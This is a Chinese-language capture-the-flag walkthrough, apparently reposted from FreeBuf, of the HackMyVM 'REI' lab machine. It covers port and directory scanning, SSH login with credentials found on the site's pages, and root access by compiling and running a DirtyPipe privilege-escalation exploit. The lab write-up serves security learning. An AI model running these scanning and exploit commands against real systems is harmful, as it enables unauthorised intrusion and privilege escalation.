hackmyvm系列8——REI
2022-5-7 17:4:51 Author: www.freebuf.com(查看原文) 阅读量:6 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

前言:

*本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

netdiscover -r 192.168.56.0/24

nmap -sV -Pn -sC -A 192.168.56.170 -p 0-65535

1651912573_62762f7d5d4dee85e251e.png!small?1651912573468

访问web端口

http://192.168.56.170:63777/

对其进行目录扫描

gobuster dir -u http://192.168.56.170:63777/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html

1651912677_62762fe57feef5d081f26.png!small?1651912677090

并没有得到有价值的东西,返回web页面对其进行观察

但是直接访问为404,对其后缀进行fuzz

wfuzz -u http://192.168.56.170:63777/indexp.FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hl 11

发现有一些目录结构文件,对其进行保存后进行目录的爆破

gobuster dir -u http://192.168.56.170:63777 -w dic.txt

访问两个都为403,因此对其再次目录爆破

访问后

http://192.168.56.170:63777/gichin/your-button/note.html

1651913187_627631e3d5541f8ba6593.png!small?1651913188619

http://192.168.56.170:63777/gichin/your-button/ssh/为403,继续对其进行爆破

二、连接SSH

访问后得到一个秘钥文件

1651913314_6276326296c02b9438bda.png!small?1651913315568

查看note.html页面,寻找用户名

点击人物图像,来带另外一个页面

http://192.168.56.170:63777/gichin/your-button/chuck-norris.html

1651913418_627632caa51c3bbb16935.png!small?1651913430048

信息,balance、karate,其中balance可能是个密码,尝试用karate作为用户名进行SSH登录。

其中需要密码,但是用balance作为密码失败了

1651913555_62763353d03eeba4e8d0d.png!small?1651913555490

查看页面源代码

尝试用chuck-norris作为用户名进行登录,密码balance

1651913749_6276341576c2733511eca.png!small?1651913749131

三、权限提升

上传提权辅助脚本

1651913850_6276347aae104f3258659.png!small?1651913851552

上传exp进行提权

gcc dirtypipez.c -o exp
chmod 777 exp 
./exp /usr/bin/mount

但是查看root.txt的时候提示不行

寻找与Maritrini有关的文件

find / -name *maritrini*

1651914215_627635e78a4b151c6dfb8.png!small?1651914216232

得到root的flag

1651914244_62763604716956aa0df28.png!small?1651914244134


文章来源: https://www.freebuf.com/articles/web/332395.html
如有侵权请联系:admin#unsafe.sh